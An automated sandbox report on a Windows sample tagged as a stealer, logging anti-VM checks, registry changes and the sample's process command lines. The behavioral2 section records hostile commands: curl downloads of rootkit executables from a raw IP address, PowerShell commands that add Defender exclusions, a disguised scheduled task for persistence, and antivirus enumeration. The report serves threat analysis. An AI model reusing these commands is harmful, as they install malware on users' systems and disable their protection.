Malware Analysis Report

2024-10-10 07:51

Sample ID 240615-z1dstsvakd
Target Bald.Win_New_Temp_Swoofer.exe
SHA256 d02f513e1673e5012e916fad43e0672ee0ff9cdfbc0733401b9b8fd4bd88d1f3
Tags
themida evasion trojan execution pyinstaller spyware stealer
score
9/10

Analysis Overview

Threat Level: Likely malicious

The file Bald.Win_New_Temp_Swoofer.exe was found to be: Likely malicious.

Malicious Activity Summary

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Checks BIOS information in registry

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Executes dropped EXE

Themida packer

Checks whether UAC is enabled

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Unsigned PE

Enumerates physical storage devices

Detects Pyinstaller

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Creates scheduled task(s)

Enumerates system info in registry

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-15 21:10

Signatures

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-15 21:10

Reported

2024-06-15 21:13

Platform

win7-20231129-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\WindowsDSEProtectionSoft.dll C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe

"C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe"

Network

N/A

Files

memory/2784-0-0x000000013F910000-0x000000014060B000-memory.dmp

memory/2784-1-0x0000000077C10000-0x0000000077C12000-memory.dmp

memory/2784-2-0x000000013F910000-0x000000014060B000-memory.dmp

memory/2784-3-0x000000013F910000-0x000000014060B000-memory.dmp

memory/2784-4-0x000000013F910000-0x000000014060B000-memory.dmp

memory/2784-7-0x000000013F910000-0x000000014060B000-memory.dmp

memory/2784-6-0x000000013F910000-0x000000014060B000-memory.dmp

memory/2784-5-0x000000013F910000-0x000000014060B000-memory.dmp

memory/2784-10-0x0000000077BC0000-0x0000000077D69000-memory.dmp

memory/2784-9-0x000000013F910000-0x000000014060B000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-15 21:10

Reported

2024-06-15 21:13

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

151s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\WindowsDSEProtectionSoft.dll C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\DefaultIcon C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\shell\open C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\URL Protocol C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\shell\open\command C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bald.Win_New_Temp_Swoofer.exe" C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519 C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Bald.Win_New_Temp_Swoofer.exe" C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\shell C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\discord-1249325487893905519\ = "URL:Run game 1249325487893905519 protocol" C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
N/A N/A C:\Windows\System32\RuntimeBroker.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 116 wrote to memory of 3912 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\System32\RuntimeBroker.exe
PID 116 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\system32\cmd.exe
PID 2008 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\certutil.exe
PID 2008 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2008 wrote to memory of 1080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 116 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe C:\Windows\system32\cmd.exe
PID 1492 wrote to memory of 60 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3088 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 60 wrote to memory of 3652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe

"C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Bald.Win_New_Temp_Swoofer.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start https://feds.lol/udman

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://feds.lol/udman

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb50d746f8,0x7ffb50d74708,0x7ffb50d74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe

C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe

C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName

C:\Windows\System32\Wbem\WMIC.exe

wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /sc onlogon /tn "av-update.sys" /tr "C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe" /rl HIGHEST /f >nul

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn "av-update.sys" /tr "C:\Users\Admin\AppData\Local\Temp\1249163947-1257661328-68222221-1259694424.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -s "https://rentry.co/hackeroopsecstubblucky/raw"

C:\Windows\system32\curl.exe

curl -s "https://rentry.co/hackeroopsecstubblucky/raw"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -s "https://rentry.co/rootkitinstalllinklol/raw"

C:\Windows\system32\curl.exe

curl -s "https://rentry.co/rootkitinstalllinklol/raw"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -s "https://rentry.co/rootkituninstalllinklol/raw"

C:\Windows\system32\curl.exe

curl -s "https://rentry.co/rootkituninstalllinklol/raw"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName

C:\Windows\System32\Wbem\WMIC.exe

wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\1349690590-1120444748-16763777-1398643380.tmp'; Add-MpPreference -ExclusionPath $filePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://104.254.246.35/files/UninstallRootkit.exe -o C:\Users\Admin\AppData\Local\Temp\1349690590-1120444748-16763777-1398643380.tmp --silent

C:\Windows\system32\curl.exe

curl http://104.254.246.35/files/UninstallRootkit.exe -o C:\Users\Admin\AppData\Local\Temp\1349690590-1120444748-16763777-1398643380.tmp --silent

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\1349690590-1120444748-16763777-1398643380.tmp'; Add-MpPreference -ExclusionPath $filePath"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp'; Add-MpPreference -ExclusionPath $filePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://104.254.246.35/files/Lucky.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp --silent

C:\Windows\system32\curl.exe

curl http://104.254.246.35/files/Lucky.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp --silent

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp'; Add-MpPreference -ExclusionPath $filePath"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=5316 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.CdmService --field-trial-handle=2124,9474701752590391574,1883100065167822084,131072 --lang=en-US --service-sandbox-type=cdm --mojo-platform-channel-handle=5428 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp

C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1123589928-1178490630-22071612-1380636793.tmp'; Add-MpPreference -ExclusionPath $filePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://104.254.246.35/files/RootkitInstall.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1123589928-1178490630-22071612-1380636793.tmp --silent

C:\Windows\system32\curl.exe

curl http://104.254.246.35/files/RootkitInstall.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1123589928-1178490630-22071612-1380636793.tmp --silent

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1123589928-1178490630-22071612-1380636793.tmp'; Add-MpPreference -ExclusionPath $filePath"

C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp

C:\Users\Admin\AppData\Local\Temp\$77-1271572685-1351225358-23125228-1364969821.tmp

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName

C:\Windows\System32\Wbem\WMIC.exe

wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

